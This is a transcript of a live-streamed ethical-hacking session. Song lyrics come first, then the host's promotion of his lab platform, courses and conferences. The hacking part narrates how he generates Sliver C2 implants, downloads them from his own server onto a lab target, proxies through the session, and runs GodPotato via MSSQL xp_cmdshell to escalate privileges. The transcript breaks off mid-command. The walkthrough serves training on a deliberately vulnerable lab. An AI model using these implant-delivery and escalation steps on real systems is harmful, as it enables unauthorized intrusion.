leaders tricked a lot of people out the faith and they detached Jesus. I came back to rescue the people lost in the jungle, recover the fumble and let them see what the sun do. We tore down the walls of the temple but left the foundation. Mold infested, roof leaking politics of a proud nation. You think I'm here to flip tables, but I ain't started yet. Way too many blueprints, but I don't see many architects. Churches hide behind public policy with a face mask. Yeah, I'm talking heavy. I'm in another weight class, anomaly. Weighted with ancient Near Eastern prophecy, scrutinizing Western philosophies and theologies, lifting up the skirt of you Pharisees like a pervert. Hard-hearted, self-righteous distributors of church hurt. They say this is the end cause the people are uninspired. The game ain't over yet, just a couple players retired.
They said we were walking away from the faith. We wasn't walking away from faith, we was walking away from fraud. We rebels again. We was handed doctrines dipped in dominance, while the systems abused the sacred. But that wasn't true. That was hypocrisy. So we tore it down. Not because we hate truth, but because we love it too much. We ain't lost. We architects now. We not destroying. We're clearing space to rebuild. A faith that can breathe. A gospel that liberates. A Jesus. As we proceed to give you what you need.
You out of touch, but you feel the words I've spoken. Do my morning meditation by the ocean. Spirit flowing through my whole body, I got motion. Leave a legacy without a statue or a sculpture. Too on, ever since I was too on. Try to buy my soul, but they often look like a Groupon. All my people eating, you know I'ma put my group on. You want the smoke, buy a casket and put a suit on. I told you, you know you killing it when you start to see the vultures. Ain't no more shame and honor, we wild out in the open. They got tarot cards, they got pills, they got potion. All I need is prayer and I'm golden. Holy water. Only talk about your chain so long before they change your song. I guess it's holy water. That's why we think that rain gon' stop after we cop that watch, but that ain't holy water. Look at the way we drip, like we just fell off a ship. We got them thinking it's holy water. All them all on your wrist, but can't spend time with your kids. I pray that they get our Holy Father.
You know what it is, man.
Holy Father, our God in heaven, keep that Kabbalah. Presidential rollies, I name my watches Obama. Kamala, commas on commas don't give you honor. And y'all don't rap your nursery rhyming like llama. Shaking they sloppy, lurking in lobbies, looking for bodies. Keep it on me, case I get caught up in his tsunami. No, they won't stop me, so they watch me like it's a hobby. Got me in the party, talking to thotties, looking ungodly. Bodies on bodies, robberies on robberies, shotties on shotties. Shot up the party, hopped in that Maserati. Nobody saw nobody, even though they all witnessed the whole thing. Treachery in our circles, we lord of our own rings. Maybe it's cinema, acting like ain't no sin in us. Each of us do what's right in our own eyes at minimum. No benefits if you walk in your own path. We turn away from God or we suffer the Lord's wrath. Get some holy water.
Get you some holy water.
Only talk about your chain so long before they change your song. I guess it's holy water. That's why we think that rain gon' stop after we cop that watch, but that ain't holy water. Look at the way we drip, like we just fell off a ship. We got them thinking it's holy water. All them all on your wrist, but can't spend time with your kids. I pray that they get our Holy Father.
It's a paradise, and it calls my name, but I can't keep taking holidays.
It's a paradox seeking paradise. Thought I'd try my luck and rolled it up like a paradise. Took a break from being present in the presence of a lesson. I ain't trying to hear the message, I escape the pain with pleasure. Taking holidays, eating bolognese, wearing Prada shades, sipping Chardonnay, check the Cartier watch. Watch everything in gold chains, melt down everything in gold flames. Idols living in my heart, what's wrong with me? All I need is time, but time's controlling me. Played the game so long, I know it's no winning. Left a holiday that gets me so healing. Feel like I deserve to have Miami vices, but every fleeting pleasure comes with sacrifices. This is not a liberty, it's license. Every holiday got hidden prices. Yikes.
Hold my heart, hold my...
Ladies and gentlemen, Boys and girls, it is Tuesday night, which means it is time for Hack Smarter Live. My name is Tyler Ramsby. I will be your host for tonight. If you don't know who I am a pen tester, ethical hacker by day, and at night, I make content. I make courses, I make videos, I live stream. Sometimes we make rap songs, but I'm super excited to have you here. And real quick, I need to give a shout out because I noticed in chat we got Nox Lumens with the 5 gifted memberships. Absolutely amazing. Thank you, Nox. Thank you for your generosity. Thank you for being here. You are the stream's MVP so far. Thank you, thank you, thank you. Hey, y'all, let me scroll up in chat and say hello and I'm going to get chat pulled over to my main screen. I say we got Privesk Labs with the first blood. Good to have you here. Javon said hacking or study tonight. We are going to be doing some hacking tonight, some live hacking over on Hack Smarter. By the way, if you want to join, the Hack Smarter event kicks off in 10 minutes. Go to live.hacksmarter.org. I'll drop that real quick in chat. If you haven't already registered, but you can get access to the lab we're going to be working on for free for 2 hours, live.hacksmarter.org. What up, Rain Light? Good to have you here, my friend. What up, Will Lopez? What up, Knight 1972? Dario TG, Abdullah Falke, if I'm saying that correct. Sync Logic checking in. Zohaib Bin Yarden. I like the name. Abel, good to have you here. What up, KLR? Good to see you again, my friend. We got Eric checking in. What's up, Eric? Will Lopez, Geeky Cat, love it. Steve Young, Anita said, saw your speech from last year's con for Simply Cyber. Can you keep preaching the mental health importance? That was so appropriate. Hey, I tell you what, someone, aka me, is going to be keynoting this year's Simply CyberCon, and I will be talking about mental health. So if you haven't gotten your tickets to Simply CyberCon, actually, I'll show you the screen. I'll walk you through that. We'll do a little folder review of Simply CyberCon since we have a little bit of time before the event kicks off. KLR says, who is this guy? I don't know. What up, Domina? What up, Real Bilbo? Heading to an emergency call. Man, brutal. What up, Firas? Good to have you here. What up, Karthik? We got Old Noob checking in for the first stream. What up, Old Noob 60? Good to have you here. By the way, if anyone else is here for the very first time, let me know. We'd love to give you a proper welcome. But Old Noob 60, welcome to the party, my friend. Really good to have you here. What up, JSO? What up, Rick Kelly? What up, two Fact Zero? What up, Rat Hat? Holy Water. Bumping some Lecrae. Yes. Well, hey, y'all. Real quick, if you are new here, let me tell you what to expect. During this live stream, we're going to do some hands-on keyboard live ethical hacking. If you're brand new to the field of ethical hacking, that's totally fine. I will do my best to explain and teach as we go, but also we kick off with just some AMA. So if you have any questions about cybersecurity or pen testing or careers or life in general, feel free to ask them. I am going to get a few things pulled up just to share with you. Let me get into my VM here. So number one, we're experimenting with this thing where you can hack alongside of me completely free. So I have my own platform where I have hands-on labs and courses and a bunch of amazing content. But when I do Hack Smarter Live, there is an event going on right here that you can click into and join. And the lab that we are going to work on in today's stream is a premium lab. So generally it requires a subscription to the platform, but during the live stream and the live stream only, you can get free access to the lab. It's pay what you can. Now I will say this, it's free for you. It's not free for me. So if you want to chip in a few dollars as a tip, I would appreciate it, but no pressure. You can go ahead and do 0 and click join event and register. So let me drop the link one more time in chat, live.hacksmarter.org. And hey, if you just want to support what I'm doing, if you go to hacksmarter.org, you can see things organized here. Now, this entire website is being redesigned soon, but here's the TLDR. We have subscriptions, incredibly affordable. You do a yearly plan, it's like $6 a month for all the labs, or for all labs and all courses, it's about $16 a month. Super affordable. You can see all of the courses we have here and all of the hands-on labs. We're adding 4 to 6 new labs every single month. A brand new hands-on Active Directory Challenge lab will be dropping this Thursday. So in 2 days, we'll be releasing a brand new lab. And tomorrow, I'm planning on it. Tomorrow, I will be releasing Hacking Active Directory Directory Volume 3. But what's going to be cool about that is it's going to be all on our platform. So all the labs will be there. Hacking Active Directory Volume 3 will give you 40 hours of lab time with 2 AD environments that I walk you through, including the one that we're working on now. It's going to be Building Magic and Share the Pain, but a lot more content than what's on YouTube. Custom modules, custom notes, quizzes, challenge labs, all built into that. I'm hoping to release that tomorrow. So exciting stuff there. The other thing I want to share with you guys is Simply CyberCon is coming up, believe it or not. Yo, Abel, thank you for becoming a member over on YouTube. You are awesome. Thank you, thank you. KLR says those labs grew very fast. Dude, I do not joke. When I commit myself to something, I make it happen. But yes, the labs have grown fast and they'll continue to grow really fast. And the price of the subscriptions will go up in the near future, but if you get one now, you're locked in at this rate. It's the cheapest it will be. Right now, I'm basically giving it to you at cost. Anyways, a conference is coming up, ladies and gentlemen, November 2nd and November 3rd, Simply CyberCon in Charleston, South Carolina. I am going to be there in person. Would absolutely love to have you make plans to join me. Let me drop a link in chat real quick. But if you are going to be here, if I go to the schedule, can I get to the schedule? Here we go. So speaker sessions day 2, you can see who's kicking this off. Did you guys catch it? Oh, where did I go? There we go. Look who's kicking it off. Yours truly. Embrace your limits seriously. So it says, this session will challenge attendees to stop idolizing overwork and start honoring the boundaries that make life meaningful. We'll talk about embracing the limits of being a parent, a partner, a human without compromising excellence in our careers. Not only is it possible, it is necessary. So I'm super, super, super excited that I get to kick things off. My wife is actually coming with me to Simply CyberCon. I don't think she's going to come to the conference, but she's coming to South Carolina with me. So if you do not have plans to attend Simply CyberCon, well, you should make plans right now. Get registered to attend Simply CyberCon. I would love to meet you. One other thing, because our labs kick off in just a few minutes, Wild West Hacking Fest. I'm curious, those of you in chat, is anyone going to be at Wild West Hacking Fest? This kicks off, ladies and gentlemen, in like 2 weeks. I will be there. I will also be there in person in Deadwood, South Dakota. So let me drop a link there. Those are 2 places you can meet me. So whether you're going to be at Wild West Hacking Fest or Simply CyberCon, I will be at both of them for the first time, at least in person. I've never attended Wild West Hacking Fest or Simply CyberCon in person. I'm excited for both. And hey, if you want to meet me at a conference, I attend 3 conferences every single year: DEF CON, Wild West Hacking Fest, and now Simply CyberCon. But this one is coming up in 2 weeks. Would love to meet you. Would love to get drinks. Love to hang out with you over in Deadwood, South Dakota. Whew. Thank you, old noob. And that's the other big thing, guys. If we look over at the calendar, this is crazy. So if you can see the calendar up here, tomorrow, the 24th, is my son's birthday. He is turning 6, which is exciting. So I took tomorrow off from work. I'm going to go have lunch with him at his school. He has an early out, and we're going to do some fun activities in the afternoon. But after that, I only have 1, 2, 3, 4. Only 4 more days as a W-2 employee. For those of you new to my journey, on October 1st, I am doing something that feels freaking absolutely terrifying, but I want to try it. I am quitting my full-time job where I make really good money to try to build something of my own. Specifically, I am building 2 companies, and HackSmarter is one of them. You've already seen that, the Hands-On Affordable Labs. The other company that I am building with my friend Jerry is Kairos.Sec. We are going to be the best, one of the best boutique pen testing firms. So, hey, if your company is looking for a pen test in Q4 or in 2026, reach out to me. You can go to Kairos.Sec.com to get information, but we'll be offering web apps, APIs, network pen testing, AI LLMs, cloud pen testing, and social engineering. You can see all of our information here. You can give us a call. You can email hello@Kairos.Sec.com. Otherwise, just click get a quote. I will personally follow up with you within 24 hours if you submit a quote. We'll jump in a call. We'll talk about the project. My goal is to be your partner of whatever organization or company you work for. So if you are looking for a pen testing partner, KairosSec is the way to go. If you are looking for training to level up, to skill up, Hack Smarter is the way to go. So I'm incredibly nervous about both things. I hope it works out. There's always the chance that it doesn't, and I've made my peace with it. I've built up enough in savings that I can basically do this for 2 years. And if it doesn't work out, and by work out I mean if I'm not able to pay my bills at the end, then I'll have to re-enter and get a job as another W-2 employee. But I'm committed to this. I think it's going to be amazing. I think it's going to work out, but it's life. You never know what's actually going to happen. But this is the plan. I'm going to be creating a lot more content when things launch, a lot more stuff during the day. Obviously, I create a bunch of content now. I live stream almost every single night, but you'll see more of me during the day teaching and doing some live streaming. Like I'll set up my camera. You can work alongside of me as I work through my workday, but it's going to be awesome, I think. All right, let me answer a few more questions, and then we're going to dive into the live hacking for the evening. Might be a little bit of a shorter stream tonight because I have, once again, a bunch of projects I'm trying to knock out in addition to streaming, but we'll still have fun. Thank you, Privest Labs. I appreciate the kind words. Thank you, everyone, for saying happy birthday to my son. I'll let him know tomorrow. You guys all told him happy birthday. What all courses are planned after the C2 one? All right, I'm going off memory, so I might miss a few. After the C2 one, I'm hoping to release Foundations of Web App Pen Testing in December or January. I want to do Intro to Azure Pen Testing. I want to do Practical Report Writing. I want to do Hacking the Robots, which will be a course on AI and LLM pen testing. I want to do a course on API pen testing and a course on external network pen testing. All within the next freaking year, which is insane. Whether or not I'll be able to get to all of them, I'm not sure. Basically, when it comes to a pen testing company, generally Q1 and Q2 are really slow. And so if Q1 and Q2 end up being slow and I have like no business on the pen testing side of things, I'm going to go hard into creating courses and creating content. If pen testing ramps up, then I'm not going to be able to focus as much on courses, but I'll still be releasing a handful of courses over the next year either way. Hack Smarter, you should make merch. We have merch. Yeah, go to store.hacksmarter. store.hacksmarter.org. Let me go ahead and share my screen, but store.hacksmarter.org. We have merch, ladies and gentlemen. So you can rock a KairosSec shirt. Oh, I thought I had mine on. I actually have a Try Hack Me shirt today. I had this one on before I boxed and then I jumped in the shower, but store.hacksmarter.org. You can get some Hack Smarter swag. I sell this at cost just so you can get some swag. What up, Hoy Manoy? Good to have you here. KLR says, you can sell used cars. That's true. If nothing else, I'll sell some cars. Abel said, I finished your hands-on fishing course last week. Awesome. Hey, thank you. Are we doing labs? We are going to be doing labs. Oh, man. And the other thing, guys, is I'm building this all in the public. So as I launch these businesses, as I've already been doing, I will document the good, the bad, and the ugly. I will give you the full journey. I mean, we're in this together. I'll take you on this journey with me. I'll share with you what it's actually like, not just your typical influencer video. And we'll see what we learn together. There's no sale on courses. Well, there kind of is. If you go to courses.hacksmarter.org, technically all of my content is on sale, like most of it anyways, so you can check it out there. That's not going to be on sale for long, but I'm just going to remind you this has started. I'm going to go ahead and sign into my account. I'll stop sharing my screen, and we're going to do some hands-on labs. I actually am going to have to redo some things. I have to get caught up to where we were at in the last stream. If you are just tuning in for the first time, we're actually continuing a series that we started before through the Share the Pain machine. But everything that I am doing right now, it's usually behind a subscription. But during this live stream and this live stream only, I am giving you completely free access to it. So I'm going to drop the link one more time in chat. live.hacksmarter.org. You can come hack right alongside of me. No subscription needed. And congrats, Abel. That's awesome, dude. Anyways, I'm going to click into HaxMurder Live. I'm going to go ahead and pay myself $0 because it'd be a little odd to pay myself. But hey, this isn't free. If you want to give something to support the infrastructure, that would be awesome. And we got Bango with the super chat over on YouTube. Thank you, Bango. Really do appreciate your generosity. I'm going to go in and click Join Event. Encourage you to do this alongside of me. Do. Hopefully, the lab's broke. The infrastructure's broken. I don't know. My own platform won't work. I can't join my own lab. I don't actually know what's gone there. I've never had that happen. Maybe I should just refresh. There we go. All right, there we go. We are in. As the hackers would say, I'm going to go ahead and launch this machine. Share the Pain AD. I'm going to stop sharing my screen again to pull up my notes. And we have to get caught back up to where I was at in the stream last week. I don't remember everything we did. So we'll review the notes together, and then we'll get back to that point, and then I'll start recording for the standalone video on YouTube. All right, let me go to on-prem. Scroll down to share the pane. And now I can share my screen. All right, first, let me go ahead and download the VPN. And I'm going to grab the IP. Go to my terminal. We'll do sudo openvpn AD. Since this is a new live event, I think it's... What? Oh, maybe I should go to downloads. Sudo openvpn AD Challenge Lab share the pane. I think it's going to be my second one because it's a live event. I think I have to do a new VPN. And we'll go ahead and get on the VPN. Rename that VPN. Open up a new tab. Name this terminal. And let's see if our machine is up yet. It takes a little bit for it to come online since it is a full Active Directory environment. So we'll give it a minute. Anita said, I'll be excited when you stream daytime. I would totally hack alongside of you. KLR said, I was surprised you posted a flag in your last video. I posted a flag because it's my platform. And like, if someone is watching the live stream and they're quite literally hand typing out the flag to get flags, that defeats the whole purpose. Also, this isn't try hack me. There's no silly leaderboard that people are trying to gamify. The purpose of this platform is to learn, to take your time, to fall down rabbit holes and to learn, not just to get flags. There's maybe in the future I'll have like a more gamified leaderboard type things, but that often just encourages that exact behavior of copying flags. So when you stream my platform, you can share flags. I don't care. If someone just copies the flags, they're a loser and they're only hurting themselves. Why can I not ping my own machine? Let me get back to the VPN. There we go. Okay. Now we'll do sudo nano etc host. There's some things we have to update here before we can dive through the rest. I think it's this one that we need to update. Can people post their machine? Yeah, so I actually take machine submissions. So if you would like to create a machine for the HackSmarter platform, I will actually compensate you. If you're in the US, I can either pay you $50 like over Venmo or PayPal. Alternatively, you can also choose a year-long sub to the labs, which is about $100 value. So if you create a machine, I will compensate you in one of those two ways. Before you create a machine though, make sure you send me the machine idea because I'm only looking for machines that are actually realistic. Things you might see in the real world, not silly CTFs. My email, I'll drop it in chat, but shoot me an email with your machine idea. I'll let you know if it's a good idea to move forward with it. And then I will compensate you for the machine as a way of giving back and to thank you for your contributions. Anyways, I need to go ahead and get caught back up. Let's see what we all did here. I know we got Bob Ross's password, and then we ended up changing the password for Alice Wonderland, it looks like. And then Alice, okay, so we do need to rechange her password. Now, if you feel lost right now, it's because you missed parts 1, 2, and 3. This is actually going to be part 4. And so I'm not going to teach through all of what I'm doing right now, but if you watch the full thing later on, you'll be able to get caught up and you won't be lost. All right, we updated her password. Oh, yo, thank you, Abel. Hey, I appreciate the super chat. You're amazing. Hey, Tyler, are you prepping for OSEP? I'm also planning to start it next year. Yes. slowly but surely, I do have a Learn One subscription with 2 exam attempts. I'm about 30% of the way through the course. I'll be honest with you, if I don't get any further in the course by the end of the year, I'm just going to schedule the exam and YOLO it since I have 2 exam attempts. I always treat those exams, if you have 2 of them, the first one's just a learning experience, and I'll see, hey, maybe I'll pass it or I'll learn like the areas on weekend. So that's probably what I'll end up doing, is taking my first attempt in January, failing it, to be honest, seeing what I'm weak with, and then going through the course in a little more depth. But yes, I do plan on taking the OSEP as well in the next year. All right, let's go ahead and make sure this actually worked. We'll use NetExec to verify the credentials real quick. Sick in the Minds is working on that right now. Exam in a couple weeks. Let us know how it goes. Very curious to hear. And good luck, my friend. All right, now we can Evil WinRM in so we can get a shell. And then we're going to have to set up some pivoting. I'm going to go ahead and open up, we'll call this Sliver. I'm going to do sudo system ctl start Sliver. Sliver C2 framework. We'll type Sliver into our terminal. And I'm going to open up another new tab, and I'm going to go to Hack Smarter, share the pane. I'm going to remove pivot.exe because I'm going to make a new pivot.exe since I have a different IP since I'm on a different VPN. And I'm going to go ahead and generate a Sliver implant real quick for Windows. Once again, if you're lost, I explained this in the previous parts of this series. I'm just getting caught up so I can start recording. But let me go ahead and do generate MTLS 10.200.1.120 on port 443. We'll save it to home Tyler Hack Smarter. Share the pane pivot.exe, and our OS is going to be Windows. And hey, I have an entire course on Sliver coming out very, very, very soon. I could actually give you guys a preview of that. While we wait for this, here, let me stop sharing my screen so I can get logged into the back end of the platform. But it's so close to being done. It's been an incredible amount of work, but you guys, I think, will really enjoy this course. Go to Intro to Sliver C2. All right, guys, here it is. Hopefully, not hopefully, it will release in early October, but it's a full course using Sliver C2 for red teaming, pen testing, and evasion. You can see everything that I cover. I have over 16 custom hands-on labs all hosted for you. You don't have to build your own lab environment with a custom capstone challenge at the end. I'm also giving you a fully working POC for evading Windows Defender for a stable Sliver implant. I don't know how long it's going to last once I release the course, but I think it's going to last a while because of how it's set up. But anyways, early October, this will be coming out, and I'm super excited to share it with you guys. In pen testing, do you use C2s, or is that better for red team engagements? It's better for, well, you can use it in a pen test if it's an internal engagement and you have multiple machines you're interacting with, then it's really helpful. I'm in the final prep before taking the PMPT and unsure if I should add more tools before taking it. If you're in final prep, do not add more tools. Use the tools that you know well. He's been saying that forever. What have I been saying forever? I've been saying forever that Sliver C2 course comes out in October. I actually said mid-October initially, but I'm moving the release date up. I'm ahead of schedule. Sean said, this is a very good advice you gave. If you have 2 exam attempts, give it a try. Don't wait. Who knows? Exactly. I mean, that was my plan, guys, when I took the OSCP. Now, this is back in 2021 when I did the OSCP. But when I took it the first time, I totally was planning on failing it. My only goal was to have fun and just get a feel for the exam. But I think that mindset is what allowed me to pass it. I passed it on my first attempt in 8 hours. I had everything done in 8 hours. All right. Let's go ahead. We have Sliver. It is, our implant should be ready. LS, I'm going to open up a web server. Let's drop it onto the machine. Do wget 10.200.1.120 pivot.exe -o pivot.exe. Okay, maybe I exaggerated a bit. I have never missed a deadline for any of my courses, for what it's worth. Every single time I've said a course is coming out by this time, did it really go that fast? All right. Every single time, though, I have said a course is coming out this time or a lab is coming out this time, I have never missed a deadline. That is while working a normal full-time job as a pen tester, having a wife and 2 kids, and just grinding it out. I'm very disciplined, and when I say something, I hold myself to that commitment if at all possible. I'm sure the day will one day come where I miss a deadline for an announcement I make, but so far that day has not come. So when I say something's going to happen by a certain month, it will happen. I will do everything in my power to make sure it happens. All right, now with Sliver, we need to set up a listener so we can catch the shell. We will do MTLS-L for our listening host, -lowercase l 443. We have our job going. Let me go ahead and spin up pivot.exe. That should give us a Sliver session, and you can see it right there. We'll do sessions-I. What up, William K? Good to have you here, my friend. All right, and now we'll do SOCKS 5 start. We have our proxy going. Cat Etsy proxy chains. Now, if you're wondering why I'm doing all this, there's a port, or rather a service, that is only exposed internally on this target machine. And for us to expose a service to our machine, we have to set up a proxy or a pivot, and that's what I'm using Sliver for here. All right, we got that set up. That, and now we'll just rename this terminal. And then I think we connected to an MS SQL database. Yes, and here's the syntax right here. We're almost to where we can start recording for YouTube. And there we go. We are on the database, and there's a few things that we had to do. Is this already enabled? I don't remember. Yes, and we have XP command shell enabled. We are MT service MS SQL. And if you remember, we did who am I priv, I think. Oh, we don't need the quotations. And you can see that we have the SE impersonate privilege, which is what I highlighted at the end of the last live stream and video. Real quick, I'll see if there's any questions I'm missing before I hit record. Abel said, "This really great quality you have. I really suck at time management and being consistent." It's all about just breaking down large things into small chunks. If you put things off, it becomes too overwhelming. So for example, my Sliver C2 course, I had the entire curriculum mostly done by the end of August, and then early September, I started filming just in any downtime I had, just knocking out a module at a time. I had 2 days off from work for PTO. A normal person would like take vacation, but I just worked those 2 days, but on my course. Choppy audio from time to time. Let me know if anyone else is hearing choppy audio from time to time. Want to know if it's just Jesse F. Moore, or if there's something on my end that I need to fix, because I don't want choppy audio. I'll wait to see what people say, Jesse. Will you also cover techniques on how to create our own POC in future? Your mic does it for a second here or there. Why? Okay, well, that's not good. I'm seeing if there's something I can fix on my end. Vimfox said no problem here. Okay, this is weird. Just for a few seconds and then it went away. It's not all that bad. I'm very much a perfectionist, y'all, when it comes to audio, though. I'm trying to think what might be causing it. Hoyman says, I don't hear anything. Jesse says, it typically does it in the beginning of your stream, and then it did it again when someone did a super chat, and then it just did it. That's odd. I wonder what would cause such sporadic audio. It's like a small chirp. All right, well, let me look at a few things on my end real quick. I have some ideas. Doesn't seem to be affecting YouTube. Well, KLR said he heard it there. Well, weird. Maybe I'll just ignore it, guys, and I'll troubleshoot it at a different time. I'm guessing it's something with the encoder over on OBS. No, it's choppy at times. I'll clip and send you on Discord. I have a feeling it is the encoder setting. Here, let me try one thing. How often is it doing it, y'all? Let me try OBS. I think I know the issue. Let me try to change one thing. Guys, if the stream disconnects, I apologize. I don't think it will, though. All right. Real quick, I just changed something in my encoder settings. I'm not sure if it takes place right away. Can you guys let me know if like anything just broke? Like if my audio all of a sudden disappeared, or if you guys are still here with me. I don't have a good way to freaking monitor it. All good. All right. It does like a popping sound. Pop. Is it my test? Microphone check. 1, 2. Oh, well. You guys let me know. You're still here. So far, so good. Please let me know in chat if it does it again. My encoder, my audio, for those of you who care about the technical details, my audio encoder settings were extremely high in OBS, and I think it was trying to do too much stuff at once, and as other things are trying to process, it may have been just messing with OBS. I think I may have fixed it in real time, but we'll find out. I am going to start recording, though, for the standalone YouTube people. Did the pop at the beginning of the check? What do you mean at the beginning of the check? It did it again? Did it just happen? We're going to spend the entire stream of me trying to troubleshoot stuff. All right, whatever. We're just going to go with it. Last live stream, I noticed where you did the Pomodoro, it happened more than once. Okay. We're going to go with it for now, guys, and just let me know. Let me know if or when it happens again. But cool. I'm going to do one more reminder because I want you guys to hack alongside of me for free. This doesn't cost you anything to follow along. So once again, go to live.hacksmarter.org and come and join. Just click Hack Smarter Live at the top. You can see we have an hour and a half to go of free lab time. So no strings attached. You can join for free. And we'll have a lot of fun hacking together. I'm going to get a few things pulled up on my other monitor, so we're ready to kick it off for the YouTube people. Let's see. Okay. Can someone contact IT? Exactly. Someone contact IT. All right. I'm going to start recording for YouTube. Now, for those of you who are new, let me explain what's going on right now. It's going to be a little bit weird because you're already here in the live stream audience, but it's during my live streams that I also make my standalone videos for YouTube as well as for the platform with the Hack With Me trainings. So although you are already here and I've already welcomed you, I'm going to hit record in OBS and do another welcome for those watching after the fact. So that's what's going on. Let's go ahead and dive in. Well, hey everyone, welcome back. We are going to finish the Share the Pain Active Directory Challenge machine here on Hack Smarter Labs. Now, if you haven't done this, I highly recommend it. It's a really well done machine. A lot of things that I see in the real world are happening on this machine. Now, this is the final part. So if you are watching starting here and you feel a little bit lost, well, that's sort of on purpose. I recommend you start from the beginning, watch every part, and also get a sub to the platform and hack right alongside of me. All that being said, let me share my screen and we will dive on in. So picking up where we left off previously, we have access to the MS SQL server as alice.wonderland. And remember, we were able to enable the XP command shell, which if you don't know MS SQL, XP command shell allows us to run system commands as whatever service the MS SQL database is running as. I also forgot to mention, if you see above my head, I make all of these while I live stream, and I live stream all the time. So if you do not subscribe on YouTube, make sure you subscribe and hit the little bell notification so that you're notified when I go live and you can be part of the live studio audience. Anyways, we are here on the MS SQL database and we can run XP command shell and we can run commands. Now, when we did that, we saw that one of the permissions we had was SE impersonate privilege. And if you've studied any exam, whether it's the OSCP, the PMPT, or you've just done some Try Hack Me and Hack the Box rooms, you know that when you see this privilege, there's a really good chance you might be able to escalate your privileges with a potato attack. I know it's a little bit weird, but there's various kinds of potato attacks that we can run, and hopefully we get NT system authority. But here's our current issue. We are on an MS SQL database. It would be much easier if we could potentially get a shell or get some type of reverse shell as our underlying user. If we do XP command shell, who am I? We are this user right here, NT service MS SQL Express, but we only have shell access as alice.wonderland. So that's going to be the first thing that I'm going to attempt. And I think one cool way to do this would be to do another sliver session to see if we can get a sliver session as NT service MS SQL Express, or actually I have a better idea. Let's see if we can use like God Potato, one of those potatoes, and then use the potato to execute our sliver session. And then potentially we would be able to get a shell as NT system authority within our sliver session, I think. I don't know if that will work, but let's go ahead and try it together. I'm going to go over to my web browser and I'm just searching for God Potato. I know it's a little bit of a weird name, but it's a great potato. If you've never tried it, I recommend it. It's one that comes in handy if you're going through the Pen 200 course. Hey, InkQ2, we are working on the Share the Pain machine from Hack Smarter Labs. Good to have you here. So here is the potato. You can see that it allows us to run commands, but potentially if we can get a sliver implant on the machine, we would, I think, be able to execute the sliver implant with God Potato. And then when we catch the shell in sliver, we would have NT system authority. At least that's my plan. Let's go ahead and see if it works. Step number 1 is let's go ahead and download a release. We have God Potato. We'll download net4.exe. I'm not sure. I think it should work. Let's go ahead and give it a shot. And it's already done. And I'm going to try to think of the best way to do this. We have EvilWinRM here. So I'm going to open up a new tab. I'm going to call this my web server. And I'm going to CP from my downloads folder. And we'll grab God Potato right here. I'm just going to move it to godpotato.exe. And now I'm going to open up a basic Python web server in my web server. Go back over to EvilWinRM. And we are in Alice Wonderland documents. That should be fine. We'll do wget 10.200.1.120. And godpotato.exe -out is godpotato.exe. All right, now it'll fail if we run it as Alice Wonderland because Alice Wonderland does not have that SE impersonate privilege. We're working with two different users here. The user that has the SE impersonate privilege is our NT Service MS SQL Express service account, not Alice Wonderland. So we need to execute God Potato with this account. But we should be able to execute God Potato on a Sliver implant and then catch it with NT System authority privileges. So let's go ahead. I'm going to background this session. And let's generate another one. I'm going to do generate MTLS, type in my IP, 443. I'm going to save it to home, Tyler, Hack Smarter, share the pain, and we'll just call this admin.exe. We'll save it for the Windows operating system. Now, one cool thing about Sliver, and I mentioned this before, it just happened again, the audio. Very odd. For those of you watching after the fact, I'm having a strange audio issue where the microphone randomly pops or randomly bugs out. I'll have to troubleshoot it later. So I apologize. It does it real quickly. I'll figure out a way to fix it. Anyways, one cool thing about Sliver is every single time we generate a new implant, it's doing dynamic compilation. What I mean by that is, yeah, everyone's talking about it. Hopefully it's fixed now. First time via YouTube. Is it fixed? Oh, thank you for dropping that. I have a theory. Notice that it happened when I was creating this binary. I think that's causing my CPU on my virtual machine to spike. And because the CPU on the virtual machine is spiking, it's also spiking my computer CPU, which is then spiking OBS. So I'm almost certain that's what's happening. And to fix it, I just need to allocate less CPU, I believe, to the VM so it can't jump into my actual VM. Anyways, that's beyond what you guys care about, but thank you for letting me know when it was happening. I'm pretty sure that's what is causing the issue. Anyways, it does dynamic compilation. Every time you generate a Sliver implant, it's a brand new implant. So if you have an AV that only relies on signature detection, it'll be bypassed because every Sliver implant has a new hash assigned to it, which I think is pretty cool. Anyways, we have our implant saved here. Let's go ahead and transfer our implant to this machine. We'll do wget p10.200.1.120, and I think I called it admin.exe. We'll do output admin.exe. Is my web server still running? It is. And it will take a little bit to transfer it. Actually, didn't take too long. But the Sliver binaries, as you can see, are quite large because of all of the dynamic compilation and obfuscation that happens when they start. But our pivot.exe was our original one. Wait, did I really set it as the same listener? Okay. We're probably going to get another audio issue here, but I need to change it from 443 to 444 because we are already listening on 443. So here, this is going to test my theory. I'm going to keep talking while I do this. You guys let me know if the audio spikes out again. I have a feeling it's going to, but let's go ahead and give this a shot. I'll hit Y. We'll save it to admin.exe. Now, I'm looking up at my CPU. It's beginning to increase. It's not there. Now it's spiking. I'm very curious now if the audio is going to freak out a little bit, because as we see our nice blue CPU increasing, we're at 98% of CPU usage. Nope. So no audio issue this time. That's interesting. You guys let me know if anyone else ends up having an audio issue, but so far smooth audio. So maybe my theory is incorrect, but no audio issues at the moment. Smooth all the way. Good so far. No change. No, okay. I don't know. I don't know what causes the audio issues. Override existing file. Let's go back over to Evil WinRM, and I'm going to go ahead and remove admin.exe. And I'm going to go and download the new one. And then over on Sliver, I'm going to set up a listener for port 444. We'll do MTLS capital L for listening host of 10.200.1.120, lowercase l for listening port of 444. And now we started up job number 2 with our MTLS listener. If we do jobs, we should see both of these listeners. Listener number 1 is on port 443, and listener number 2 is on port 444. Now we need to figure out how the actual syntax works for the potato attack. So we can do -cmd and then run a command. I think I could do, can I just do God potato and then run the file? I'm curious if I'm able to do that. Let's try this. We'll go over to our MS SQL, make sure it's still here. And it is. So if I do XP command shell, and let's go over to EvilWinRM so we can see our present working directory, is C users Alice Wonderland and document. So that's where we want to go from. So I'm thinking if I grab this full path, go over to our terminal, and I run God potato.exe, right? Yep, there's God potato.exe. If I do this right, I'm actually going to be amazed because I'm trying to think about what the correct syntax would be. So if we do God potato.exe and we jump back over to this, we do -cmd. And then if we do cmd-c, I think we can then specify our other file here. But instead of God potato, we'll do admin.exe like that. Oh, they don't have access to Alice Wonderland. Okay. Well, that's easy. That's an easy thing to fix. We can cp admin.exe and we'll go to C users public maybe. Oh, we can't write to public. All right, C, do we have a temp folder? We do. Okay, so then we'll cp from C. I'm just going to copy it. All right, and then we'll grab the admin.exe. Oh, it did it again. Guys, I don't know. I apologize for the audio. I don't know what's going on. I will I'll do my best to fix it once the stream is done. All right, we have godpotato.exe and admin.exe now in the C temp folder. Let's see if we can do what we were doing before, but we're just going to change the file path to C temp. And same with this one right here. All right, ctemp 